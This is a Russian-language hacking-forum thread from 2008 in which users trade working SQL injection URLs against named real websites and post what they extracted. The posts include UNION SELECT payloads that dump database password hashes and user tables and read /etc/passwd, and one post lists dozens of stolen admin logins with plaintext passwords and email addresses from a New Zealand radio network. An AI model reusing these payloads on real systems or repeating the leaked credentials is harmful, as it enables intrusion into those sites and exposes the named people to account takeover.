10.01.2008, 23:03
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
http://www.dukemednews.org/news/article.php?id=10059+union+select+0,1,2,3,user,pas sword,6,7+from+mysql.user/*
зачооот ))).Первый раз чето сделал гг)))
всем пасибко =)
|
|
|
11.01.2008, 01:00
|
|
Новичок
Регистрация: 10.01.2008
Сообщений: 3
С нами:
9649366
Репутация:
-2
|
|
http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email) ,2+from+top_user+limit+0,1/*
http://www.wordtec.com/TopSites/rate.php?site=-1+union+select+concat_ws(0x3a,database(),user()),2/*
http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email) ,2+from+top_user+limit+0,1/*
|
|
|
|
11.01.2008, 01:06
|
|
Новичок
Регистрация: 10.01.2008
Сообщений: 15
С нами:
9649261
Репутация:
11
|
|
Код:
http://www.linspire.com/linspire_letter_archives.php?id=1+and+2=0+union+select+1,concat_ws(0x3a,version(),user()),3,4/*
version : 4.0.27-standard-log
user : linspire@10.0.0.20 |
|
|
|
11.01.2008, 02:43
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
www.chatelet-theatre.com
Код HTML:
http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
4.1.20:root@localhost:chatelet
Код HTML:
http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+mysql.user/*
root:3def4e5361e65bde (user: pass(hash)) ( http://www.chatelet-theatre.com/admin/)
Код HTML:
http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0: operator:/root:/sbin/nologin
...
|
|
|
|
11.01.2008, 04:59
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
С нами:
10039659
Репутация:
209
|
|
http://www.dukemednews.duke.edu/news/article.php?id=-801+union+select+1,concat_ws(0x3a,user,password),3 ,4,5,6,7,8+FROM+mysql.user/*
|
|
|
|
11.01.2008, 05:05
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
http://www.sportingwheelies.org.au/
http://www.sportingwheelies.org.au/page.htm?ID=-1+union+select+1,concat_ws(0x3a,login,password),3+ FROM+SW_SITE.security+LIMIT+5,1/*
Админку не нашел, но зато штук десять акков добыть можно (правда нахрен они без админки большой вопрос xD).
|
|
|
|
11.01.2008, 08:33
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 42
С нами:
9648596
Репутация:
49
|
|
http://www.naushko.ru/whisper.php?id=36231+union+select+1,2,3,4,5,6/*
Поля подобрал, а что дальше делать - хз  |
|
|
|
11.01.2008, 08:52
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от rankor777
http://www.naushko.ru/whisper.php?id=36231+union+select+1,2,3,4,5,6/*
Поля подобрал, а что дальше делать - хз ^^
http://www.naushko.ru/whisper.php?id=36231+and+1=-1+union+select+1,2,3,concat(email,0x3a,pass),5,6+f rom+users+limit+0,1/*
Пароли там кстати в открытом виде, и аккаунтов за 20к...
|
|
|
|
11.01.2008, 11:37
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от ice1k
^^
Код:
http://www.naushko.ru/whisper.php?id=36231+and+1=-1+union+select+1,2,3,concat(email,0x3a,pass),5,6+f rom+users+limit+0,1/*
Пароли там кстати в открытом виде, и аккаунтов за 20к... http://forum.antichat.ru/showpost.php?p=552492&postcount=4446
да и тему от баянов чистить иногда надо...
Код:
http://www.jomacs.org/article.php?article_id=-1+union+select+1,2,concat_ws(0x3a,user_login,password,email,user_id),4,5,6,7,8,9+from+members+limit+0,1/*
Код:
http://www.jomacs.org/article.php?article_id=-1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9+from+phpbb_users+limit+1,1/*
|
|
|
|
11.01.2008, 13:43
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
http:// www.newstalk.co.nz/anndetail.asp?region=1+or+1=@@version
'Microsoft SQL Server 2000
http:// www.newstalk.co.nz/anndetail.asp?region=1+or+1=(select+top+1+cast(log in_name+as+nvarchar)%2B%27%3A%27%2Bcast(password+a s+nvarchar)%2B%27%3A%27%2Bcast(email_address+as+nv archar)%20from%20admin_logins)
'rhys:rhys:rhys@webenz.co.nz'
'harrison:harrison:harrison@webenz.co.nz'
'greg:greg:greg.mcnamara@webenz.co.nz'
'brian:barclay333:changeme@sometime.com'
'zb2:wellington:gordonm@radionetwork.co.nz'
'jacqui:jacqui:jacqui.jones@webenz.co.nz'
'philv:zmwel1:philv@radionetwork.co.nz'
'zbremote:grx336:brianb@radionetwork.co.nz'
'helen:superwoman:helenmccarthy@radionetwork.co.nz '
'terabyte:janem:jane@terabyte.co.nz'
'andrew:topping:andrewtopping@radionetwork.co.nz'
'briannews:barclay333:brianb@radionetwork.co.nz'
'andrewt:piccys:andrewturley@radionetwork.co.nz'
'brian2:barclay333:brianb@radionetwork.co.nz'
'affiliates:affiliates:allanlee@radionetwork.co.nz '
'zmonline:zmonline:zm@zmonline.com'
'weatherman:phil:philipduncan@radionetwork.co.nz'
'amante:anything:amante@radionetwork.co.nz'
'zmprogs:tractor:zm@zmonline.com'
'zbhamilton:mooloo:heemih@radionetwork.co.nz'
'davec:zmwel2:davec@radionetwork.co.nz'
http:// www.kathyspies.com/anndetails.asp?NewsID=1+or+1=@@version
'Microsoft SQL Server 2000
http:// tlcwalford.com/anndetails.asp?NewsID=1+or+1=@@version
'Microsoft SQL Server 2005
http:// www.titans-consulting.com/anndetails.asp?id=1+or+1=@@version
'Microsoft SQL Server 2005 |
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Комбинированный вид
